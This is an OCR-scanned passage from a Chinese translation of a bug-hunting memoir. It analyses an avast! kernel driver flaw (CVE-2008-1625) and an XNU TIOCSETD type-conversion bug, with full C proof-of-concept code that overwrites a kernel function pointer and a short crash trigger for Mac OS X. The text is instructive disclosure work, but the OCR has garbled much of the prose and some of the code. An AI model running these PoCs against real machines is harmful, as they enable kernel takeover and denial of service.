BPBTBDF?7 cmp dword ptr [eax+4], i8BADBBAh ; validation of input data 
B&B1BDFE jz short loc 18E86 








loc 18E86: 

xor edx, edx 

mou eax, [ebp+yar 548] 

mou 

mou 

add i, ; source address 
mou ; length 

mou edi, [eax«18n] >; destination address 
rep mousd > mencpy() 

det PendingCount?2 

inc dword ptr [eax'2ah] 

push ; Wait 

push ; Increment 

add 

push ; Event 

call ds :WeSetEvuent 

xür edi, edi 











图 6-5 IDA Pro 中 的 漏洞 代码 路 径 示 意图 ， 第 2 部 分 
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以 下 是 memcpy() 调 用 的 C 伪 代码 。 
memcpy ([EAX+0x18], ESI + 4, Ox21a * 4); 


更 抽象 的 形式 如 下 。 





memcpy (user controlled address, user controlled data, 0x868); 


因此 ， 写 0x868 Fi (0x21a * 4 FT, VA rep movsd 指令 从 一 个 地 方 复制 
双 字 到 另 一 个 地 方 ) 的 用 户 控 制 数 据 到 任意 一 个 用 户 控 制 的 地 址 是 可 能 的 ， 无论 
用 户 空 间 还 是 内 核 空 间 。 很 好 ! 

图 6-6 显示 了 这 个 bug, FATA F o 


Aavmker4.sys 


内 核 空间 





(2) 
一 -一 > 输入 数据 长 度 == Ox878? 


| (3) 


用 户 输 入 数据 中 有 
OxDODEADO7 和 OXx10BADOBA 
1X2 ^ (G04? 


i" 









memcpy (user. controlled. address, 
user. controlled value, Ox868) 


\Device\AavmKer4 : 





IOCTL 请 求 : 
OxB2DGO030 





用 户 空间 


内 三 数据 损坏 


图 6-6 ”从 IOCTL 请 求 到 内 存 数 据 损 坏 ， 漏 洞 概览 


(1) 一 个 IOCTL 请 求 〈0xB2D60030 ) 发 给 使 用 AavmKer4 设备 的 内 核 驱 动 
Aavmker4.syso 

(2) 驱动 程序 代码 检查 IOCTL 输入 数据 长 度 是 否 等 于 0x878。 如 果 相 等 , 继续 
执行 第 3 步 。 

(3) 驱动 程序 检查 用 户 控制 的 IOCTL 输入 数据 是 否 包 含 值 OxDODEADO7 和 
0x10BADOBA。 如 果 包 含 ， 继 续 执行 第 AG. 
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(4) 执行 错误 的 memcpy() 调 用 。 
(5) 内 存 数据 被 破坏 。 


6.2 jm: A] FH 


为 了 控制 EIP, REER -TAEWA Hiit. Æ IOCTL 调度 例 程 中 
RRIT, dEJESJpgAbysH—^ iOS ITI; o 








. text : 00010D8F push 2 ; DWORD 

. text :00010D91 push 1 ; DWORD 

. text :00010D93 push 1 ; _DWORD 

. text :00010D95 push dword ptr [eax] ; _DWORD 

. text :00010D97 call KeGetCurrentThread 

. text :00010D9C push eax ; _DWORD 

. text :00010D9D call dword_12460 ; the function pointer is called 
. text :00010DA3 mov [ebx+18h] eax 

. text : 00010DA6 jmp loc 10F04 

[..] 

.text:00010DB6 push 2 ; _DWORD 

. text : 00010DB8 push 1 ; DWORD 

. text : 00010DBA push 1 ; DWORD 

. text : 00010DBC push edi ; _DWORD 

. text : 00010DBD call KeGetCurrentThread 

. text : 00010DC2 push eax ; DWORD 

text:00010DC3 call dword 12460 ; the function pointer is called 


.data:00012460 ; int ( stdcall *dword 12460)( DWORD,  DWORD,  DWORD,  DWORD,  DWORD) 
.data:00012460 dword 12460 dd 0 ; the function pointer is declared 


地 址 .text:00010D9D 处 和 地 址 .text:00010DC3 处 调用 了 地 址 .data:00012460 
处 声明 的 函数 指针 。 为 了 控制 EIP， 只 和 需 窗 写 这 个 函数 指针 ， 然 后 等 着 它 被 调用 。 
RE TAF POC 代码 来 操纵 这 个 函数 指针 。 








代码 清单 6-2 ”用 来 操纵 地 址 .data:00012460 处 函数 指针 的 POC 代码 ( poc.c ) 


01 #include «windows.h» 
02 #include «winioctl.h» 
03 #include <stdio.h> 
04 #include <psapi.h> 


05 
06 #define IOCTL OxB2D60030 // vulnerable IOCTL 
07 #define INPUTBUFFER SIZE 0x878 // input data length 
08 


09 inline void 
10 memset32 (void* dest, unsigned int fill, unsigned int count) 
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11 { 

12 if (count > 0) { 

13  asmi 

14 mov eax, fill // pattern 

15 mov ecx, count // count 

16 mov edi, dest // dest 

17 rep  stosd; 

18 } 

19 j 

20 } 

21 

22 unsigned int 

23 GetDriverLoadAddress (char *drivername) 

24 1 

25 LPVOID drivers |1024]; 

26 DWORD cbNeeded - 0; 

27 int cDrivers = 0; 

28 int i EO 

29 const char * ptr - NULL; 

30 unsigned int addr - 

31 

32 if (EnumDeviceDrivers (drivers, sizeof (drivers), &cbNeeded) && 
33 cbNeeded « sizeof (drivers)) { 
34 char szDriver[1024]; 

35 

36  cDrivers = cbNeeded / sizeof (drivers[0]); 

37 

38 for (i = 0; i < CDrivers; i+) { 

39 if (GetDeviceDriverBaseName (drivers[i], szDriver, 
40 sizeof (szDriver) / sizeof (szDriver[0]))) { 
41 if (!strncmp (szDriver, drivername, 8)) { 

42 printf ("%s (%08x)\n", szDriver, drivers[i]); 
43 return (unsigned int)(drivers[i]); 

44 I 

45 j 

46 } 

47 } 

48 

49 fprintf (stderr, "ERROR: cannot get address of driver %s\n", drivername); 
50 

51 return 0; 

52 } 

53 

54 int 

55 main (void) 

56 { 

57 HANDLE hDevice; 

58 char * InputBuffer - NULL; 

59 BOOL retval - TRUE; 

60 unsigned int driveraddr 25 

61 unsigned int pattern1 = OxDODEADO7; 

62 unsigned int pattern2 = Ox10BADOBA; 

63 unsigned int addr to overwrite - 0; // address to overwrite 
64 char data[2048]; 
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// get the base address of the driver 
if (!(driveraddr = GetDriverLoadAddress ("Aavmker4"))) { 
return 1; 


j 


// address of the function pointer at .data:00012460 that gets overwritten 
addr to overwrite = driveraddr + 0x2460; 


// allocate InputBuffer 

InputBuffer = (char *)VirtualAlloc ((LPVOID)o, 
INPUTBUFFER SIZE, 
MEM COMMIT | MEM RESERVE, 
PAGE EXECUTE READWRITE); 


HITTITE ae 
// InputBuffer data: 

E 

// .text:00010DC9 mov esi, [ebx«oCh| ; ESI == InputBuffer 


// fill InputBuffer with As 
memset (InputBuffer, Ox41, INPUTBUFFER SIZE); 


// .text:00010DE6 mov eax, [esi+870h] ; EAX == pointer to "data" 
memset32 (InputBuffer + 0x870, (unsigned int)&data, 1); 


MI MM B B B C LM P M P CL P P Cg P Pg g MM C C M M M P Bg MP Cg M ML AAT Bg 
// data: 
// 


// As the "data" buffer is used as a parameter for a "KeSetEvent" windows kernel 
// function, it needs to contain some valid pointers (.text:00010E2C call ds:KeSetEvent) 
memset32 (data, (unsigned int)&data, sizeof (data) / sizeof (unsigned int)); 


// .text:00010DEF cmp dword ptr [eax], ODODEADO7h ; EAX == pointer to "data" 
memset32 (data, patterni, 1); 


// .text:00010DF7 cmp dword ptr [eax+4], 10BADOBAh ; EAX == pointer to "data" 
memset32 (data + 4, pattern2, 1); 


// .text:00010E18 mov edi, [eax«18h] ; EAX == pointer to "data" 
memset32 (data + 0x18, addr to overwrite, 1); 


/1/1111111111111111111/111111111111111111111111111111111111111111111111111111 
// open device 
hDevice = CreateFile (TEXT("\\\\.\\AavnKer4"), 

GENERIC READ | GENERIC WRITE, 

FILE SHARE READ | FILE SHARE WRITE, 

NULL, 

OPEN EXISTING, 


0, 
NULL); 


if (hDevice !- INVALID HANDLE VALUE) 1 
DWORD retlen - 0; 


// send evil IOCTL request 
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122 retval = DeviceloControl (hDevice, 
123 IOCIL, 

124 (LPVOID) InputBuffer, 
125 INPUTBUFFER SIZE, 
126 (LPVOID)NULL, 

127 0, 

128 &retlen, 

129 NULL); 

130 

131 if (!retval) 1 

132 fprintf (stderr, 

133 

134 

135 } else { 

136 fprintf (stderr, 

137 

138 

139 return (0); 

140 } 


"[-] Error: DeviceloControl failed\n"); 


"[-] Error: Unable to open device. n"); 


代码 清单 6-2 的 第 67 47, 内 存 中 驱动 程序 的 基地 址 保存 在 driveraddr 中 。 然 


后 ， 第 72 行 计算 函数 指针 的 地 址 ; 


这 个 地 址 被 算 改 过 的 memcpy (WHR S. P 


75 行 分 配 一 个 INPUTBUFFER SIZE 大 小 ( 0x878 ) 的 缓冲 区 。 这 个 缓冲 区 包含 IOCTL 
输入 数据 ， 全 部 以 十 六 进 制 值 0x41 AE (ULE 86 行 )。 然后 指 问 为 一 数组 的 指针 
被 复制 到 输入 数据 缓冲 区 中 ( 见 第 89 行 )。 在 驱动 程序 的 反 汇 编码 中 ， 这 个 指针 
在 地 址 .text:00010DE6 处 被 引用 : mov eax, [esi«870h]. 

在 memcpy() 函 数 调用 之 后 ,程序 紧 接着 调用 了 内 核 也 数 KeSetEvent()。 


:00010E10 add esi, 4 ; Source address 
text :00010E13 mov ecx, 21Ah ; length 
text:00010E18 mov edi, [eax«18h] ; destination address 
text:00010E1B rep movsd ; memcpy() 
text:00010E1D dec PendingCount2 
text:00010E23 inc dword ptr [eax+20h] 
text:00010E26 push edx ; Wait 
. text: 00010E27 push edx ; Increment 
.text:00010E28 add eax, 8 
. text:00010E2B push eax ; Parameter of KeSetEvent 
. text: 00010E2B ; (eax = IOCTL input data) 
. text :00010E2C call ds:KeSetEvent ; KeSetEvent is called 
. text : 00010E32 XOr edi, edi 
[..] 





由 于 EAX 寄存 需 指 回 的 用 户 数据 被 用 作 此 上 果 数 的 一 个 参数 ( 见 .text:00010E2B ), 





数据 缓冲 区 需要 用 有 效 的 指针 填充 ， 








以 防止 非法 访问 。 我 用 程序 目 身 的 有 效用 户 





空间 地 址 填充 整个 缓冲 区 ( 见 第 9%7 行 ) 之 后 在 第 100 行 和 103 行 ， 将 两 个 预 设 
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的 值 复制 到 数据 缓冲 区 (UL. text:00010DEF 和 .text:00010DF7 )， 而 在 第 10617, 
memcpy () 函数 的 目标 地 址 也 复制 到 了 数据 缓冲 区 中 ( .text:00010E18 mov edi, 
[eax+18h] )。 然 后 ,驱动 程序 以 读 / 写 方式 打开 设备 ( 见 第 110 行 ), 而 恶意 的 IOCTL 
请 求 发 送 给 了 有 汤 洞 的 内 核 驱动 程序 ( 见 第 122 行 )。 

56 POC 代码 之 后 ,运行 Windows XP 上 的 VMware 客户 机 系统 并 把 WinDbg 
附加 到 内 核 上 ( 以 下 调试 命令 的 描述 见 B.2 市 )。 


kd» .sympath SRV*c:\WinDBGSymbols*http://msdl.microsoft.com/download/symbols 
kd» .reload 

[ 

kd» g 


Break instruction exception - code 80000003 (first chance) 
炒米 炒米 米 米 米 炒米 炒米 米 米 炒米 米 米 米 米 米 米 炒米 炒米 炒米 米 米 米 米 米 米 米 米 米 米 米 米 炒米 米 米 米 米 米 米 米 米 米 米 米 米 炒米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 炒米 炒米 炒米 米 米 米 米 


米 

















You are seeing this message because you pressed either 
CTRL+C (if you run kd.exe) or, 
CTRL+BREAK (if you run WinDBG), 

on your debugger machine's keyboard. 


THIS IS NOT A BUG OR A SYSTEM CRASH 


If you did not intend to break into the debugger, press the "g" key, then 
press the "Enter" key now. This message might immediately reappear. If it 


does, press "g" and "Enter" again. 


Xo 0 X* X X X X X X X KX X 
兴 X* X X X X X ¥ X X X* X 


米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 米 
nt!RtlpBreakWithStatusInstruction: 
80527bdc cc int 3 


kd> g 


然后 我 用 Visual Studio 的 命令 行 C 编译 器 (cl ) 编译 这 段 POC 代码 ， 并 在 
VMware 客户 机 系统 中 以 非特 权 用 户 的 号 份 执 行 它 。 


C:\BHD\avast>cl /nologo poc.c psapi.lib 
C: \BHD\avast>poc.exe 


执行 POC 代码 后 并 没 发 生 什 么 。 那 我 怎么 才能 知 拓 函数 指针 是 否 被 成 功 算 改 
T? 好 吧 ， 我 只 需要 随意 打开 一 个 可 执行 文件 来 触发 防 病 毒 引 擎 承 可 以 了 。 打 
开 下， 在 调试 希 中 得 到 以 下 信息 。 

IHIHHHHHHHHHHHHHHRHHE AAVMKER: WRONG RO JHBHHHHRHEHRHHHRHHHHHHE 


Access violation - code c0000005 (!!! second chance !!!) 
41414141 ?? 4: 


搞定 ! d Cte Ely see TERI el ZIP. ASuEXX— x. BEL Da asd 
出 更 多 信息 。 
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kd> kb 

ChildEBP 
WARNING: 
ee91abco 
ee91ac34 
ee91ac44 
ee91ac58 
ee91ad00 
ee91ad34 


AAAAAAIA 
CEeylLauy4 


0184c4d4 
0184ffb4 
0184ffec 


RetAddr 
Frame IP 
17925da3 
804ee119 
80574d5e 
80575bff 
8056e46c 
80534638 
7c90e4f4 
650052be 
7c80b713 
00000000 


86202628 
86164030 
86075728 
86164030 
0000011c 
0000011c 


FAMAM n 
vuvuUULLe 


0000011c 
0016d2a0 
65004f98 


Args to Child 
not in any known module. Following frames may be wrong. 


e1cd33a8 
860756b8 
861494e8 
860756b8 
00000000 
00000000 


AAAAAAAA 
VUVUUUUVUVU 


b2d60034 
00150000 
0016d2a0 


00000001 
806d22d0 
860756b8 
861494e8 
00000000 
00000000 


AAAAAAAA 
VUVJUUUU 


0184ff74 
0016bd90 
00000000 


0x41414141 

Aavmker4+0xda3 

nt! IopfCallDriver+0x31 

nt ! IopSynchronousServiceTail+0x70 
nt! TopXxxControlFile+0x5e7 

nt !NtDeviceloControlFile+0x2a 


nt IVi CactfallintrusnvltQ 
Mee NLP ASL GLILIICL YTUALO 


0x7c90e414 
0x650052be 
0x7c80b713 


Kd» r 

eax=862026a8 ebx-860756b8 ecx=b2d6005b edx=00000000 esi-00000008 edi-861494e8 
eip-41414141 esp=ee91abc4 ebp=ee91ac34 iopl=0 nv up ei pl nz na po nc 
CS-0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl-00010202 
41414141 ?? 22? 


利用 过 程 如 下 ， 如 图 6-7 所 示 。 

(1) 输入 数据 的 长 度 是 0x878 吗 ?” 如 果 是 ， 执 行 第 2) 步 。 

(2) 用 户 空间 缓冲 区 data 被 引用 。 

(3) data[0] 和 data[4] 中 是 否 找 到 了 预期 的 模式 ?如 有 果 是 ， 执 行 第 (4) 步 。 











(4) memcpy() 调 用 的 目标 地 址 被 引用 。 
(5) memcpy () FAZIT IOCTL 输入 数据 复制 到 内 核 的 .data 区 域 。 
(6) 通过 算 改 过 的 也 数 指针 完全 控制 了 EIP。 


利用 过 程 


IRP 





SystemBuffer 


.… 41414141 
41414141. ... 


(1) 


OxX41414141 


内 核 空间 


= 


InputBufferLength == Ox878 ? 


是 否 找到 了 预期 网 模式 ? 


图 6-7 对 avast! 漏 洞 的 利用 
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如 果 执 行 POC 代 码 时 没有 附加 内 核 调 试 需 ,就 会 出 现 若 名 的 蓝屏 死机 ( BSoD ) 
( UL 6-8 )。 


A problem has been detected anc windows has been shut down to prevent damage 
to your computer. 


If this is the first time you've seen this stop error screen, 
restart your computer. If this screen appears again, follow 
these steps: 


check to be sure you have adegLate disk space. If a driver is 
identified in the stop message, disable the driver or check 
with the manufacturer for driver updates. Try changing video 
adapters. 


Check with your hardware vendor for any BIOS updates. Disable 
BIOS memory options such as caching or shadowing. If you need 


to use safe Mode to remove or cisable components, restart your 
computer, press F8 to select Acvanced Startup Options, and ther 
select Safe Mode. 


Technical information: 

*** STOP: O0x0000008E (OxcOO000C5, 0x41414141, OxEE965B50, 0x00000C00) 
Beginning dump of physical memcry 

Physical memory dump complete. 


Contact your system administrator or technical support group fcr further 
assistance. 





图 6-8 ”蓝屏 死机 (BSoD ) 


控制 了 EIP 之 后 ， 我 开发 了 两 个 利用 程序 。 一 个 可 以 把 SYSTEM 权限 赋予 任 
何 发 送 请 求 的 用 户 (权限 提升 ，privilege escalation )， 男 一 个 程序 通过 车 名 的 直接 
内 核对 象 操 控 (Direct Kernel Object Manipulation, DKOM ) 技术 5 在 内 核 安装 一 
个 rootkit。 

法 律 明 令 禁 止 提供 完整 的 、 可 工作 的 漏洞 利用 程序 ， 但 是 如 采 你 感 兴趣 ， 可 
以 在 本 书 的 网 站 上 看 一 段 实际 演示 利用 程序 的 视频 。 UU 




















6.3 漏洞 修正 


2008 年 3 月 29 日 ， 星 期 六 


2008 年 3 月 18 日 我 把 这 个 bug 通 知 给 ALWIL Software ,今天 他 们 发 布 了 avast! 
的 更 新 版 本 。 哇 ， 对 于 商业 软件 开发 商 来 说 这 可 真 够 快 的 。 





6.4 ”经 验 和 教训 
作为 一 名 程序 员 及 内 核 驱 动 开 发 者 : 
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a 为 导出 的 设备 对 象 定义 严格 的 安全 设置 ， 不 要 允许 非特 权 用 户 读 写 这 些 
设备 ; 

O 务必 注意 正确 地 验证 输入 数据 ; 

a 内 存 复制 操作 的 目标 地 址 不 应 该 从 用 户 提 供 的 数据 中 获得 。 





6.5 补充 


2008 年 3 月 30 日 ， 星 期 日 





因为 这 个 漏洞 已 修复 , 可 以 下 载 到 一 个 新 版 的 avast!, 所 以 今天 我 在 自己 的 网 
站 上 发 布 了 一 份 详细 的 安全 报告 中。 这 个 bug 编号 是 CVE-2008-1625。 图 6-9 显 
示 了 这 个 漏洞 修复 的 时 间 表 。 


T A8 dd 


ALWIL_ Software 


<9 To fs, sla] 新 版 avast! 发 布 
\ / \ 我 发 布 安全 报告 
o_o? 
03.18.2008 03.19.2008 03.29.2008 03.30.2008 


图 6-9 从 通知 开发 商 到 我 发 布 安全 报告 的 时 间 表 
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址 为 http://bit.ly/Hfxemp )。 
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library/ff543287.aspx ( 短 址 为 http://bit.ly/Hfjw2u ). 
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tk 4.4BSD 还 老 的 BUG 


2000 年 3 月 ?3 日， 星期 六 


上 星期 我 的 MacBook 终 于 到 了 了。 熟悉 了 Mac OS X 平 台 后 ， 我 决定 仔细 看 看 
OS X 的 XNU 内 核 。 花 几 个 小 时 过 翻 内 核 代 人 码 ， 我 找到 了 很 好 的 bug， 在 内 核 试 
图 处 理 一 个 特殊 TTY IOCTL 时 发 生 。 这 个 bug 很 容易 触发 ， 我 瑟 了 POC 代码 允 
许 非 特权 本 地 用 户 通过 内 核 错 误 (kernel panic ) HAZ HR. Za, MERE, 
党 试 开 发 一 个 漏洞 利用 程序 来 看 看 这 个 bug 是 否 允 许 任 意 代 码 执行 。 这 时 ， 事 
情 变 得 稍微 有 点 儿 复 杂 。 s oli ——— OS X 内 核 的 方 
法 。 如 果 有 两 台 Mac， 这 不 成 问题 ,但 是 我 只 有 一 台 : RHI MacBook. 





























7.4. BP zal 
tes i cc XNU 内 核 源 代码 ， 品 然后 通过 以 下 步 又 寻找 漏洞 。 


一 步 : 列 出 内 核 的 IOCTL。 本 音 中 我 使 用 上 平台 是 
口 Ta 识别 输入 数据 。 Intel Mac, OSX 10.4.8, h tÈ ER + 


第 三 % 
三 步 : 跟踪 输入 数据 。 xp-792.15.4objwa/RELEASE_1386。 


111 





7.1 发 现 漏 洞 


下 面 详细 介绍 这 些 步 又 。 


7.1.1 第 一 步 : 列 出 内 核 的 IOCTL 





为 了 列 出 内 核 的 IOCTL, 我 直接 在 内 核 源 代码 中 搜索 常用 的 IOCTL R. 每 个 
IOCTL 都 分 配 了 一 个 数字 , 通常 由 安定 义 生成 。 根 据 IOCTL 的 类 型 , OSX 的 XNU 
内 核定 义 了 以 下 宏 : IOR、_ION 和 IOWR。 


osx$ pwd 
/Users/tk/xnu-792.13.8 


osx$ grep -rnw -e _IOR -e _IOW -e _IOWR * 
[ 


xnu-792.13.8/bsd/net/bpf.h:161:#define BIOCGRSIG  IOR('B',114, u int) 

xnu-792.13.8/bsd/net/bpf.h:162:#define BIOCSRSIG . IOW('B',115, u int) 

xnu-792.13.8/bsd/net/bpf.h:163:#define BIOCGHDRCMPLT — — IOR('B',116, u int) 

xnu-792.13.8/bsd/net/bpf.h:164:#define BIOCSHDRCMPLT — — IOW('B',117, u int) 

xnu-792.13.8/bsd/net/bpf.h:165:#define BIOCGSEESENT IOR('B',118, u int) 
B 


xnu-792.13.8/bsd/net/bpf.h:166:#define BIOCSSEESENT  IOW('B',119, u int) 


列 出 XNU 内 核 支 持 的 IOCTL 后 ， 为 了 找到 实现 这 些 IOCTL 的 源 代码 文件 ， 
我 在 整个 内 核 源 代 码 中 逐一 搜索 列表 里 的 IOCTL 名 。 下 面 是 搜索 BIOCGRSIG IOCTL 
的 例子 。 


osx$ grep --include=*.c -rn BIOCGRSIG * 
xnu-792.13.8/bsd/net/bpf.c:1143: case BIOCGRSIG: 


7.1.2 第 二 步 : 识别 输入 数据 


为 了 识别 IOCTL 请 求 的 用 户 输入 数据 ， 我 检查 了 处 理 这 些 请 求 的 内 核 冰 数 。 
我 发 现 这 些 函 数 通 常 接 收 一 个 名 为 cmd 的 u long 型 参数 ， 以 及 一 个 名 为 data 的 
caddr t 型 参数 。 

示例 如 下 。 





源 代 码 文 件 xnu-792.13.8/bsdmetat/at.c 
ive] 


135 int 
136 at_control(so, cmd, data, ifp) 
137 struct socket *so; 


138 u_long cmd; 
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139 caddr t data; 
140 struct ifnet *ifp; 
141 1 


[ 


源 代码 文件 xnu-792.13.8/bsd/net/if.c 
Ce V!|"AAG GLUVACC UCOCCCCVC|CC AA]UU CU T 


1025 int 

1026 ifioctl(so, cmd, data, p) 
1027 struct socket *so; 
1028 u long cmd; 

1029 caddr t data; 

1030 struct proc "p: 

1031 { 


[ 


源 代码 文件 xnu-792.13.8/bsd/dev/vn/vn.c 


[..] 
877 static int 
878 vnioctl(dev t dev, u long cmd, caddr t data, 


879 . unused int flag, struct proc *p, 
880 int is char) 
881 { 


[ ] 

这 些 函 数 参 数 的 作用 一 看 名 字 便 知 : cmd 参数 保存 IOCTL 请 求 编号 ，data & 
数 保存 用 户 提供 的 IOCTL 数据 。 

在 Mac OS X E, IOCTL 请 求 通常 通过 ioct1() 系 统 调用 发 送 给 内 核 。 这 个 系 
统 调 用 的 原型 如 下 。 


osx$ man ioctl 





[..] 
SYNOPSIS 

#include «sys/ioctl.h» 

int 

ioctl(int d, unsigned long request, char *argp); 
DESCRIPTION 


The ioctl() function manipulates the underlying device parameters of spe- 
cial files. In particular, many operating characteristics of character 
special files (e.g. terminals) may be controlled with ioctl() requests. 
The argument d must be an open file descriptor. 

An ioctl request has encoded in it whether the argument is an "in" 
parameter or "out" parameter, and the size of the argument argp in 

bytes. Macros and defines used in specifying an ioctl request are 

located in the file <sys/ioctl.h>. 


[ 


7.1 





IOCTL 请 求 发 送 给 内 核 时 ， 人 参数 request 必须 传人 正确 的 IOCTL 编号 ，argp 
必须 传人 巾 用户 提供 的 IOCTL 请 求 数据 。ioct1() 的 参数 request 和 argp 分 别 对 应 
T AVE PC] SX. cmd 和 data. 

我 找到 了 自己 想 要 的 : 大 部 分 处 理 IOCTL 请 求 的 内 核 函 数 都 有 一 个 data & 
数 ， 包 含 或 者 指向 用 户 提 供 的 IOCTL 输入 数据 。 








7.1.3 第 三 步 : 跟踪 输入 数据 


找到 内 核 中 处 理 IOCTL 请 求 的 地 方 后 ， 我 在 这 些 内 核 函 数 中 跟踪 输入 数据 ， 
寻找 潜在 的 漏洞 。 阅 读 源 代码 时 ， 我 不 经 意 间 发 现 了 几 个 看 似 很 有 趣 的 地 方 。 我 
发 现 的 最 有 趣 的 潜在 bug, 是 在 内 核 试图 处 理 一 个 特殊 的 TTYIOCTL 请 求 时 发 生 
的 。 下 面 列 出 XNU 内 核 源 代码 中 相关 的 代码 行 。 

















源 代 码 文 件 xnu-792.13.8/bsd/kern/tty.c 


| 

816 /* 

817 * Ioctls for all tty devices. Called after line-discipline specific ioctl 
818 * has been called to do discipline-specific functions and/or reject any 
819 * of these ioctl commands. 

820 */ 

821 /* ARGSUSED */ 

822 int 

823 ttioctl(register struct tty *tp, 

824 u_long cmd, caddr_t data, int flag, 

825 struct proc *p) 


826 { 

[..] 

872 switch (cmd) { /* Process the ioctl. */ 
[..] 

1089 case TIOCSETD: { /* set line discipline */ 
1090 register int t = *(int *)data; 

1091 dev t device = tp->t dev; 

1092 

1093 if (t >= nlinesw) 

1094 return (ENXIO); 

1095 if (t != tp-»t line) ( 

1096 s - spltty(); 

1097 (*linesw[tp-»t line].l close)(tp, flag); 
1098 error - (*linesw[t].1 open)(device, tp); 
1099 if (error) { 

1100 (void) (*linesw[tp->t_line].1 open)(device, tp); 
1101 splx(s); 

1102 return (error); 

1103 

1104 tp->t_line = t; 


1105 splx(s); 
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1106 ] 
1107 break; 
1108 } 


[ 


如 果 一 个 TIOCSETD IOCTL 请 求 发 送 给 内 核 , 程序 选中 第 1089 {THY switch case 
分 文 。 在 第 1090 行 , 用户 提供 的 data ( 类 型 是 caddr t, 其 实 就 是 char * 的 typedef) 
保存 在 有 符号 整 型 变量 tt 中 。 之 后 在 第 1093 47, t 的 仁和 nlinesw 比较 。data fH 
由 用 户 提 供 , 因此 一 个 字符 串 值 可 能 对 应 无 符号 整 型 值 0x80000000 或 者 更 大 的 值 。 
如 果 这 样 ，t 会 因 第 1090 行 的 类 型 转换 而 变 成 一 个 负 值 。 代 码 清单 7-1 举例 说 明 
了 为 什么 会 变 成 负数 。 











代码 清单 7-1 演示 类 型 转换 行为 的 样 例 程序 ( conversion bug example.c ) 


01 typedef char * caddr t; 


02 

03 // output the bit pattern 

04 void 

05 bitpattern (int a) 

06 { 

07 int m = 0; 
08 int b mu 
09 int cnt = 0; 
10 int nbits m 
11 unsigned int mask = 0; 
12 

13 nbits = 8 * sizeof (int); 

14 m = 0x1 << (nbits - 1); 

15 

16 mask = m; 

17 for (cnt = 1; cnt <= nbits; cnt++) { 
18 b = (a & mask) ? 1: 0; 
19 printf ("%x", b); 

20 if (cnt % 4 == 0) 

21 printf (" "); 
22 mask >>= 1; 

23 } 

24 printf ("An 55 

25 } 

26 

27 int 

28 main () 

29 { 

30 caddr t data = "\xff\xff\xff\xff"; 
31 int t - 0; 

32 

33 t = *(int "datas 

34 

35 printf ("Bit pattern of t: "); 


36 bitpattern (t); 
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38 printf ("t = %d (0x%08x)\n", t, t); 
39 

40 return 0; 

41 } 


7B 30. 314133 FUL Al OS X 内 核 源 代码 中 的 那儿 行 相同 。 这 个 例子 中 , 我 
选择 将 IOCTL 输入 数据 直接 设 为 oxffffffff( 见 第 30 行 ), 第 33 行 类 型 转换 之 后 ， 
控制 台 会 打印 t 的 位 模式 和 十 进 制 值 。 这 上 段 样 例 代码 执行 后 的 输出 如 下 。 
osx$ gcc -0 conversion bug example conversion bug example.c 
osx$ ./conversion bug example 


Bit pattern or t: 1111 1111 1111 1111 1111 1111 1111 1111 
t = -1 (0xffffffff) 


输出 显示 ,如果 由 4 个 oxff 字 节 信 组 成 的 字符 串 转 换 为 一 个 有 符号 整数 t, t 
的 值 将 是 -1。 更 多 类 型 转换 的 信息 和 相关 安全 问题 见 A.3 市 。 

WMR t 是 负数 ， 内 核 代 码 第 1093 行 的 检查 将 返回 FALSE， 因 为 有 符号 整 型 变 
tg nlinesw 的 值 是 大 于 0 的 。 如 果 发 生 这 种 情况 ,程序 将 进一步 处 理 用 户 提 供 的 t 











值 。 在 第 1098 47, t 的 值 用 作 了 一 个 函数 指针 数组 的 索引 。 我 能 控制 这 个 数组 的 
索引 ， 因 此 可 以 指定 任意 一 个 内 存 位 置 ， 让 内 核 去 执行 。 这 样 ， 我 就 能 完全 控制 
内 核 执 行 流程 了 。 感 谢 平 末 公 司 为 我 留 了 这 个 可 怕 的 bug. © 

以 下 是 对 这 个 bug air, QA 7-1 所 示 。 


内 核 


OxFFFFFFFF 


(4) 





EIP 


OXOOOOOOCOO 


图 7-1 描绘 我 在 OS X AY XNU 内 核 中 发 现 的 漏洞 
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(1) KAŽE AH linesw[ ] 被 引用 。 

(2) HP RERA t 用 作 linesw TECH B2 o 

(3) 基于 用 户 控制 的 内 存 位 置 ， 程序 引用 了 一 个 指 回 假 定 的 1 open() KAGE hE 
的 指针 。 

(4) 这 个 1_open() 卫 数 的 假定 地 址 被 引用 并 调用 。 

(5) 1_open() 假 定 地 址 处 的 值 复制 到 指令 指针 寄存 右 ( EIP ATAF )。 

t 的 值 是 由 用 户 提 供 的 ( 见 图 7-1 (2))， 所 以 我 们 就 有 可 能 控制 复制 到 EIP 中 
的 地 址 值 。 











7.2. imi FH 


找到 这 个 漏洞 后 ， 我 用 以 下 步骤 来 控制 EIP。 

O 第 一 步 : 触发 这 个 bug 使 系统 朋 尝 (拒绝 服务 )。 
口 第 二 步 : 准备 一 个 内 核 调试 的 环境 。 

口 第 三 步 : 连接 调试 器 和 目标 系统 。 

O 第 四 步 : 控制 EIP。 


7.2.1 第 一 步 : 触发 这 个 bug 使 系统 月 溃 《〈 拒 绝 服务 ) 


一 旦 找到 这 个 bug， 触 发 它 使 系统 朋 尝 就 容易 了 。 只 要 发 送 一 个 错误 的 
TIOCSETD IOCTL 给 内 核 。 代 码 清 单 7-2 是 制造 月 尝 的 POC 源 代 人 码 。 





代码 清单 7-2 ”POC 代码 ， 触 发 在 OS XX 内核 中 发 现 的 bug (poc.c ) 


01 #include <sys/ioctl.h> 

02 

03 int 

04 main (void) 

05.3 

06 unsigned long ldisc = Oxff000000; 


08 ioctl (0, TIOCSETD, &ldisc); 


10 return 0; 





一 台 加 新 的 MacBook: 1 149 390. — LED Ze bz a8: 899 美元 。 仅 用 
11 行 代码 让 Mac OS X Zi: 无 价 。 


BAI a PEF WA SEBO P Er iix Ec POC ARI 





osx$ uname -a 
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Darwin osx 8.8.3 Darwin Kernel Version 8.8.3: Wed Oct 18 21:57:10 PDT 2006; 一 


root:xnu-792.15.4.0bj^/RELEASE I386 1386 1386 


osx$ id 
uid=502(seraph) gid-502(seraph) groups=502(seraph) 


osx$ gcc -o poc poc.c 


osx$ ./poc 


xx Et POC 代码 执行 后 立即 出 现 了 Mac OS X 的 标准 月 演 界 


You need to restart your computer. Hold down the Power 
button for several seconds or press the Restart button. 


